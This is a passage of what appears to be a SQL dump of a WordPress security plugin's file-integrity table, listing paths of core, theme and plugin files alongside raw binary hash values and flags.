��ۤ��y[\\,�/��7��6�\r','',0,'?'),('��B�H���w����','wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php',0,'�����#��S��O���','�����#��S��O���','���2��6��@_�Ѹdd���t�\Z��a[sN���O','',0,'?'),('�Ұ�^�(�L�Ǡ�ǝ�','wp-content/themes/sg-window/img/icons/aim.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WU���6		��\'','B���v�,>yK�Cr�	U���=��\n�l�ft�%/','',0,'?'),('�ں�$x~uϘxz��','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-header-highlight-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7�R�w߻Ϡ	]','�O5xˈu�:��)�J{_�7�G�}���','',0,'?'),('����?+K\'��s�g�D�','wp-content/themes/fabulous-fluid/images/grid-img11.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�>bp�UZ�_��','�j���C�:)>�h�tU!#�#�J��','',0,'?'),('��A-��zN���','wp-content/themes/twentynineteen/inc/helper-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŀ<)�8�j���/SԜ','�ք��8�J��j��\n�� ��g�^\'�','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�.L�>q��L@y��t','���J\\X�(ù��m@k�T�,��Ol���','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}����	y���v�','',0,'?'),('�(��u�L)����O','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��7<�yf�\nb:ʄ','&O3w��Q��d�x�������@\n���m�?�$','',0,'?'),('�1��e���I��Ͷ','wp-content/themes/mh-magazine-lite/includes/mh-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�g1��=\nōԧ�׊','�㭚�!��+z�p \r�����z���瞿�','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Ke򩶂�\"/�w�','KwĿ���\Z˅�+CH�J\n\'��x ���M','',0,'?'),('�=W���ێ���c7','wp-content/themes/fluida/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?J��{[j��c�4�X','F\n,+�0@w\\�eir��:��M��u�]u�','',0,'?'),('�>XY\07�l��yn','wp-content/themes/hueman/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' m-�e��~gaQ��h','�i��Va�9�u�@~�P;#��HwJ�����Q','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�E��2�t��\'�L�Dsp','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/page-builder-section-item/class-page-builder-section-item.php',0,'��̣�����y|_�T�','��̣�����y|_�T�','�*f��*]Wk�a-t�2�c��F�]�/��','',0,'?'),('�P��0����b�p�','wp-content/themes/verbosa/admin/images/logo-about-customize.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�hK���3d����','�3|F�h�V+\r�)s�R��4�Lu�x�ʎo','',0,'?'),('�jt��=�qLjo��M?','wp-content/themes/tortuga/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��kJ�wr8>�w9','!s��SYRB��(wR�1/���m�{�^�,g��','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('�nU	�8��\n8�3Լ�<','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/export.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�ӶU�,��[��J\0�','`-?�^=$���w5���7	��w�Qښ���	~','',0,'?'),('�y�NJ���{:�Å�','wp-content/themes/nirvana/images/socials/Facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.E�8���4�Q�j�f�','/T2j\"��3u4\'�}B���������e�Ѕ̒','',0,'?'),('��<h����Cd?�','wp-content/themes/alpha-store/js/jquery.flexslider-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q:]U�f�}il�\'$','���6�I�|�i��*����\Z|�+�x�','',0,'?'),('����c�np�u�#�Y&','wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php',0,'w�!~�,t�[���Y�','w�!~�,t�[���Y�','0>S�}�%{��a���3���0y�A�bᅻ','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p.�!N��r�����m','�A�A�E��@V�8�#4\'�Fb�\r_�f-7','',0,'?'),('�����k_t����','wp-content/themes/hueman/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 7����Z:8I�`�',']��FH�p6��O�@#h��:L���ɠ�@�k�','',0,'?'),('����܅�F�nw�Uz#','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_navbar.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��X�)����4Hl','*�h=�iZ<{����C����׸5�>��l�','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���G-w���=�','|6���.�W��NScˆ��#��ޱ\0�2','',0,'?'),('��_�F�h)6�.��','wp-content/themes/square/inc/css/no-sidebar-condensed.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���\\C-r�l5x?�','�!��\'n���.x�a����@F�S=���Ă','',0,'?'),('�Ϣ;Ǒ�.��c��','wp-content/themes/aqueduct/inc/dragfun/dragthemesfunction.php',0,'5�S=�1|�B�_�','5�S=�1|�B�_�','�+toס���l��w�ګ�Ϧ��c��}��?�','',0,'?'),('������c��\ZR','wp-content/themes/relia/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]���^6x��]�-','\'�9�rzC�~�dCh�Pyk}:�Q�7:���k','',0,'?'),('�ݧlp�S*LST$�8/','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;胞�G�}���/','��(��$��1��ܠ>�jq��v����ߑh�','',0,'?'),('��j��Sp�&0','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-enumerate-tables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','պq����r���u�Q��','�,������f]#�160>1^��p]�~��','',0,'?'),('��SQ^��|�ܽΥ��','wp-content/themes/hueman/languages/fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��� �\\\"SՅI}�','�]���Vk>g`�0�LO��B^\'�f�}9s$o�','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�a���S~|@��`��','r@c����X}���,�q��Ə�]奧Ɇ�','',0,'?'),('�\n�`���$iL<G6','wp-content/themes/accelerate/inc/widgets/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?~�#���.�8��v�','��]IEj���������k!\'7���[��','',0,'?'),('�^Q6l��J!�	�ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('��+�x�~� yi&\0Q','wp-content/themes/twentytwentyone/template-parts/header/site-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e@ڞF\n��1���','ǛO��g�\ZXPECn��o�`�����+�i','',0,'?'),('�7`�i��oF|�G','wp-content/plugins/unyson/framework/extensions/breadcrumbs/views/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('�#K=iq>�u�p�!�k�','wp-content/themes/hueman/functions/init-sidebars-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:oTG�p�g��','�gn�jAgM#�SF�b��U�Rʉ!����','',0,'?'),('�0�$�\'`�Õ�n�\\','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!<��Tp���+','�I�ʌ�?�(5�]]F�r�A�~�{t�J?��','',0,'?'),('�2�n�i\0D2Mh�','wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߩ���V;���a�','�RM�]��Nڊƕe\n}*��\0x#@��_c�s�<�','',0,'?'),('�|\ZIW�J�?]���3','wp-content/plugins/spam-captcha/core/lang/SL_framework-es_MX.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ե\\|m��U\0�K�HJ�','�	v[�wPs���?i)\\4�:�k�F϶�fE','',0,'?'),('���ˆ]�Q��mc��','wp-content/plugins/wordpress-seo/admin/views/tabs/advanced/permalinks.php',0,'*,\n}Y�!�q�b��','*,\n}Y�!�q�b��','a�r����� ���ս�ey˹\0\"`\"�>�','',0,'?'),('��ɱ%��a{Z�j	%�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��z��i�/��9R� ','wp-content/themes/vega/assets/css/bootstrap-social.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3G�~�\Z�G�','s@J�Gφ�����Rg����&.����\\�c','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�E/�N�v��:','	�5U��hz�t%��S���\'?JD���','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�Į�`��T�P','�i��n�1�*�F�CQ��Q<�	�*{MzX@','',0,'?'),('�����P�W*c�0�','wp-content/themes/panoramic/library/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~`�4S��خ���t�x','�_n��䉂RZ���~�%��j\'k�?�u��Pk','',0,'?'),('���d�Z��O9h��','wp-content/themes/tortuga/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��ӕ|���m�r��','3�e��\Z���m���YBĭFV?X��S5Vф','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\\��\nU�����y4�R','2;�\n�#�q��C}\n~��&��?��J���H','',0,'?'),('��o�P�QFFp3^V\n','wp-content/themes/mh-magazine-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��\0��q4�T0Q�f��','\0��JTN�$0��@���Ӑ�e�L75ek7i���','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��6Dp5�<r�','⎛�m���j\ZLs{wb7�hWƎ���wx��','',0,'?'),('��@ȯ��о`����','wp-content/themes/nirvana/admin/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R39Q�ɳf\r1f�Y%','N�����@�=sf���&��7�\Z�','',0,'?'),('��z@m�|��F�e�ܨ','wp-content/themes/travelify/library/tgmpa/tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\r�Ѫ����9�����','���P�+`��[\0$)���*t� 腁����H','',0,'?'),('���7��<\rP\"�f%�','wp-content/plugins/wp-date-remover/includes/class-wp-date-remover-loader.php',0,'�l��B2�t��=N���','�l��B2�t��=N���','s5�3UR�x�0b[���R9E��@��\'�Ѥ�7','',0,'?'),('��\"����,h���','wp-content/themes/wen-business/third-party/font-awesome/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߰/�m�	�X��h��','��raӧ�0G���n��cL]s׫�:��wHJ�','',0,'?'),('�\0$�=\0�::y�wS','wp-content/themes/aqueduct/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ1R�E�o�_��i�','=���]W?�Ph2�q�=I�R�ւ_���^d�','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f��;[5L$k��@3','B������\\�\n�כ�ܕ�#c�hz�?���\'�','',0,'?'),('��\Z �13�D|��','wp-content/themes/nirvana/styles/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-a�����!sM���4','��}yj%�_0��1B�Ke��2�r,4\0)�%ۨ�','',0,'?'),('�\Z;�����=��@�','wp-content/themes/fabulous-fluid/images/btn-menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�U�2�n��]����','G��xju��!xiN�,ބ���]!���5GIhr�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eƧ�A.�E�2��$','YPU���ѱ�O�*��N=|H�Tt���\\8`','',0,'?'),('��A����)͹D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��\\cA+O\\+','<��0��\nM��a�����id�:S�����Wl�','',0,'?'),('�&�:*�W�F��|����','wp-content/plugins/wordpress-seo/admin/class-social-admin.php',0,'��cG�T��$����','��cG�T��$����','��z?�絸���K�M\\\r������c��)���','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����T/s�/��','�\'\r�d�p��ZE�%`R$?M������{�(x�','',0,'?'),('�1h>ż[D���S�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.th.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nϒ�e�|��`�*�P�','›U\r�\rqt�-�����9�~/֚�W��1�','',0,'?'),('�BCI,���D�cR�\r','wp-content/plugins/unyson/framework/includes/option-types/multi/class-fw-option-type-multi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��1��	��{�W�','\n�� ����s<�ʋI?�������K׸#��1\n�]','',0,'?'),('�H}�A�J�\nG�o)u','wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��᳀��2���rmV','���r���J]s6�8�˜2!��\ZpG����','',0,'?'),('�K(�������$]z0X','wp-content/themes/fabulous-fluid/js/source/customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m	��>����(�','���_ݳ�Ђk|�W����|�/3u椕','',0,'?'),('�_�T�)�{��L�8','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/class--fw-ext-backups-module-tasks.php',0,'D1��(��ˡ���rV','D1��(��ˡ���rV','�l!+[��=�E��,�M�b�����Y��QO','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',0,'\r��\'��sfc\n(��O�','\r��\'��sfc\n(��O�','��=���I1�!���^[�`���(Sn�G�','',0,'?'),('�w	���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�_\r�w�{iv�','W�q��$�|��yn���a�$\06ܖ<(�Ƴ�}','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('��HQ�w$a��ɱ','wp-content/themes/mh-magazine-lite/languages/de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ID�z�urg���Tن','�Z���\r\\]���s�ٌ>���g���:vp\Z,','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mv�i`�eH̪�','ܸ��vBL�%��:��b\nW�,^ӷ}��KM\Z','',0,'?'),('��S��I�x�y�\0�J','wp-content/themes/accelerate/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O�5�Rv�hU.','���j�%�U{b�4�:.cH�KX���0�Vѡ','',0,'?'),('��� �8\Z\"����Q�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/static.php',0,'P�,A�R2pV��6ƭ','P�,A�R2pV��6ƭ','eB�{�)x���	q�͎�O��\ZTN��L{�Nܴ�','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�~�hTp��P�ee�g','��i!uy���5��[7�-�o��	A�Y,�m$','',0,'?'),('��ؘ�-�m4)}��	�','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.{W��\Z�4����׹��','�x��b�̟Z�o�1�s\Z�s�>��X:��Z','',0,'?'),('��dmX�8�r�q�','wp-content/themes/clean-magazine/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��j\n:DU�H=[��{','d��	~E����U�[�`	��4Q\Zw�\0�[b','',0,'?'),('�ՑA���xi�Zp�','wp-content/themes/vega/parts/banner-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0�r��޳	��','��(�p����y��-%	N��~�Oh����(�e','',0,'?'),('��&U*!LB1�\Z���','wp-content/themes/panoramic/customizer/customizer-library/extensions/fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','왢|?u	3=B����','C��uۉ/_�TYum��P����i�~�|�','',0,'?'),('��}2NX���2��T�','wp-content/themes/verbosa/cryout/css/jquery-ui.theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�\n�<�W�O��','�UG����ΰ�R煥��fk����0���','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��{<�i�{��T�-�','wp-content/themes/nirvana/fonts/Oswald-Regular-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8x\0H���I�\rD�f','��\r��l�a��F��y�w~�g�6���S��ۤ','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M:jI����t�����','��M��Ji4�3i�kQ��)���n�{�du<)�','',0,'?'),('��j;�}\"s� �)��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_glyphicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y%0��@|\"`�c��','f�Hݹ7�؟ �@X�Ɂ�IN���*�G?nGQ','',0,'?'),('���)E���N��Ҙ','wp-content/themes/clean-magazine/inc/clean-magazine-breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��ٟp����Gv�','1;d�4�|���d�Z��}Op��k����','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����ħ7�	�7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('�\n��ݨ��F��p?ʋ','wp-content/themes/morfeu/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�|��?�4�m��j','Y�}�Y�}\Z��\Z��f�xU�o/>-��և�','',0,'?'),('�\rbD^�K�3�LkR�','wp-content/themes/relia/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�ð�m)��BU8','�޳�j�ҍ��\0VƖ�y��a�U޲7+���','',0,'?'),('�ٝ6�I���[k���','wp-content/plugins/unyson/framework/includes/option-types/typography/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`q�b���y���e��','�@\\���a��5� ;@��`@{��д�C�','',0,'?'),('��H�l�|���:��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.opensrs.php',0,'����=�:u�4�	P','����=�:u�4�	P','��\\b���Ԭ������BDi��ɔ�2t�','',0,'?'),('�{r�<5,��5��','wp-content/themes/clean-magazine/images/headers/buddha.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��z�T�p��ڮ','A�e�3�\0Z������NE��D�;��!30�|�','',0,'?'),('� ����Z�!�^0/','wp-content/themes/hueman/languages/en_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�8A��e����Q���','��sbu�8�?�\ZGg��!�\n�TS}��i','',0,'?'),('�$�b�\0,�Qf�[퇙','wp-content/plugins/wordpress-seo/deprecated/class-onpage-notifier.php',0,'��b���V��I+�en','��b���V��I+�en','�+�\'ӱ_5�C�62������(�E�s�','',0,'?'),('�(��2�ǜ�3q\0xY��','wp-content/themes/illdy/layout/fonts/glyphicons/glyphicons-halflings-regular.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!Fh���e�y#�-�e[','����$�6�`�|��y+�^	8c%���k�','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('�6�K�Ue^zO��','wp-content/themes/hueman/assets/front/img/demo/5-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tʼn�a�Z��}G��V','����6N\'�Hu�3[Z����R���a�hYk0','',0,'?'),('�9gLÅi��Њ��=O','wp-content/themes/clean-magazine/inc/clean-magazine-structure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�4A.-}L\\B\r��3','H\\�8tO,G7eє�]w�~��qW_��E/	','',0,'?'),('�D����]�|߼�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M9H,ɖ�Xʝ*�g�\Z','Y}�@YȈ^]/%��(t_�N��V#(�\"�','',0,'?'),('�Yy󿀠�Y�֟Z�','wp-content/plugins/contact-form-7/languages/contact-form-7-mk_MK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1��!<�Z�%�^U','c��˭�?(ݏ�����@.���Fu���_@','',0,'?'),('�|�De���~�}Qqz','wp-content/plugins/all-in-one-wp-migration/lib/view/common/report-problem.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�q�-��4�6~��','%9a�\0�f��|	�B����}���N@|��-���','',0,'?'),('��ߟ�dh)A��9<�X','wp-content/themes/nirvana/images/socials/MindVox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}�n�>\\�ˍ�5','HB�>C�\0Х>%��n �qn��}���6*','',0,'?'),('����)��a��D��>�','wp-content/themes/wen-business/template-parts/single-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aCak������z�\0','\' 8ҨR�h��g�x�E��1\Z�Ơ�:�4','',0,'?'),('�����g��;Wx4�\"','wp-content/themes/aqueduct/img/nobraking.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%+ٙ����9�)�ڱ��','������[];���`��K�ڷƷV�C�sP','',0,'?'),('���M|�H�LHɑ}�','wp-content/themes/fabulous-fluid/js/source/jquery.cycle/jquery.cycle2.shuffle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΊK�%\Zl�Uc��Z','5��C����o����S���X���d���X','',0,'?'),('���\\��=��{��&','wp-content/plugins/unyson/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$Ŀ�;X��#�wLq�~','�\0�!�R�%[����z���:϶Ռ\\γ','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2΢�	�/�E!�<s�','\\�=���5��3	�ώv��_%�2��A�?$','',0,'?'),('��+h��vy�{�\\','wp-content/themes/sg-window/img/4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�2ۜSu2���','�̶�-�zPo=a��b���P����c1}��Ty','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-�d\0*��n��d','�6�A�	RFt�~ʨ�p��%j*Y�]�B[','',0,'?'),('����D�ĥC�x^�,�','wp-content/themes/sg-window/sidebar-1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�2	�Uj����ة]','�hCm����/8����٘^�3��Y���y�','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��}�kFO+JH��ah��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.asia.php',0,'}�ރ:�^